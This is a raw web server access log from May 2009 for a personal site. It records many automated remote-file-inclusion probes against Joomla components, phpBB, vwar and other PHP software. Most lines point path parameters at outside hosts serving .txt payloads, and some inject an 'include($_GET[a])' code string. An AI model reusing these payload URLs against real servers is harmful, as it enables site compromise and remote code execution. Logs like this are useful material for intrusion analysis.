222.239.76.25 - - [22/May/2009:09:38:40 -0700] "GET /logs/access_080530.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.206.26 - - [22/May/2009:09:38:51 -0700] "GET /logs/access_081118.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [22/May/2009:09:39:00 -0700] "GET /logs/access_081118.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.43.0.140 - - [22/May/2009:09:39:06 -0700] "GET /logs/access_080107.log%20%20//Neos_Chronos/header.php?base_folder=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [22/May/2009:09:39:06 -0700] "GET /logs/access_080204.log%20%20//Neos_Chronos/header.php?base_folder=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [22/May/2009:09:39:26 -0700] "GET /logs/access_090303.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.241.40.51 - - [22/May/2009:09:39:30 -0700] "GET /logs/access_081125.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:39:33 -0700] "GET /logs/access_081007.log/principal.php?conteudo=http://208.98.22.241/id.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:39:34 -0700] "GET /logs/principal.php?conteudo=http://208.98.22.241/id.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:39:38 -0700] "GET /logs/access_081128.log/principal.php?conteudo=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:39:40 -0700] "GET /principal.php?conteudo=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:39:49 -0700] "GET /logs/access_090203.log/show_news.php?cutepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [22/May/2009:09:40:20 -0700] "GET /logs/access_090301.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.232.54.48 - - [22/May/2009:09:40:21 -0700] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.232.54.48 - - [22/May/2009:09:40:21 -0700] "GET /logs/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:09:40:34 -0700] "GET /logs/access_081007.log/principal.php?conteudo=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:09:40:34 -0700] "GET /principal.php?conteudo=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:09:40:34 -0700] "GET /logs/principal.php?conteudo=http://208.98.22.241/id.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:09:40:34 -0700] "GET /logs/access_081128.log/principal.php?conteudo=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.76.25 - - [22/May/2009:09:40:41 -0700] "GET /logs/access_090510.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:09:41:11 -0700] "GET /logs/access_081202.log/str.php?lang=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:41:16 -0700] "GET /logs/access_080611.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:41:16 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:41:16 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:41:16 -0700] "GET /logs/access_080419.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [22/May/2009:09:41:19 -0700] "GET /logs/access_081118.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:41:40 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:41:40 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.77.136.123 - - [22/May/2009:09:41:46 -0700] "HEAD /bikes/occcb/eBayISAPI.dll.htm HTTP/1.0" 200 0 "-" "Mozilla/3.0 [en] (compatible; Win98; U)" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:41:48 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:41:52 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:41:52 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:41:52 -0700] "GET /logs/access_080618.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.70.151 - - [22/May/2009:09:41:58 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/thumbs/thumbs_107.jpg HTTP/1.1" 200 79959 "-" "Googlebot-Image/1.0" "dmulk.com"
65.23.158.226 - - [22/May/2009:09:42:00 -0700] "GET /logs/access_090120.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:42:00 -0700] "GET /logs/access_080618.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:42:02 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:09:42:09 -0700] "GET /logs/access_090120.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:42:35 -0700] "GET /logs/access_090325.log/show_news.php?cutepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:42:47 -0700] "GET /logs/access_080611.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:42:47 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:42:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:42:51 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 200 7987 "-" "Mozilla/5.0" "www.dmulk.com"
203.152.213.84 - - [22/May/2009:09:42:55 -0700] "GET /logs/access_081118.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:42:55 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.152.213.84 - - [22/May/2009:09:42:55 -0700] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.152.213.84 - - [22/May/2009:09:42:56 -0700] "GET /logs/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:43:13 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:43:13 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:43:13 -0700] "GET /logs/access_080614.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:43:22 -0700] "GET /logs/access_081116.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:43:23 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.79.60 - - [22/May/2009:09:43:37 -0700] "GET /logs/access_071023.log HTTP/1.0" 200 25506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:43:56 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:43:56 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:43:56 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:44:00 -0700] "GET /logs/access_081116.log//modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:09:44:00 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:09:44:00 -0700] "GET /logs/access_080611.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:09:44:02 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 7987 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:09:44:03 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:44:06 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:44:06 -0700] "GET /logs/access_080611.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:44:06 -0700] "GET /logs/access_080419.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:44:07 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:44:07 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:44:07 -0700] "GET /logs/access_080611.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:44:07 -0700] "GET /logs/access_080419.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:44:09 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:44:10 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:09:44:11 -0700] "GET /logs/access_081116.log//modules/vwar/admin/admin.php?vwar_root=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:09:44:30 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:09:44:30 -0700] "GET /logs/access_080611.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:09:44:30 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:44:41 -0700] "GET /logs/access_080428.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:44:44 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:44:45 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:09:44:48 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 7988 "-" "Mozilla/5.0" "www.dmulk.com"
69.59.148.76 - - [22/May/2009:09:45:12 -0700] "GET /logs/access_071227.log/administrator/index.php?mosConfig_absolute_path=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.59.148.76 - - [22/May/2009:09:45:12 -0700] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.59.148.76 - - [22/May/2009:09:45:12 -0700] "GET /logs/access_080221.log/administrator/index.php?mosConfig_absolute_path=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:09:45:22 -0700] "GET /logs/access_090510.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:09:45:22 -0700] "GET /logs/access_080621.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.152.213.84 - - [22/May/2009:09:45:50 -0700] "GET /logs/access_090301.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:46:29 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:46:29 -0700] "GET /logs/access_080428.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:46:30 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:46:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:09:46:33 -0700] "GET /logs/access_080419.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:46:34 -0700] "GET /logs/access_080511.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.45.190.166 - - [22/May/2009:09:46:35 -0700] "GET /skin/zero_vote/login.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [22/May/2009:09:46:35 -0700] "GET /logs/access_080126.log//skin/zero_vote/login.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [22/May/2009:09:46:35 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:46:35 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:46:36 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.45.190.166 - - [22/May/2009:09:46:42 -0700] "GET /logs/access_090212.log//skin/zero_vote/login.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:46:50 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:47:28 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:47:31 -0700] "GET /guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:09:47:31 -0700] "GET /logs/access_081030.log%20%20/str.php?lang=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:47:32 -0700] "GET /logs//guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:47:37 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.151 - - [22/May/2009:09:47:46 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/124.jpg HTTP/1.1" 200 599394 "-" "Googlebot-Image/1.0" "dmulk.com"
66.249.70.151 - - [22/May/2009:09:48:05 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/099.jpg HTTP/1.1" 200 390330 "-" "Googlebot-Image/1.0" "dmulk.com"
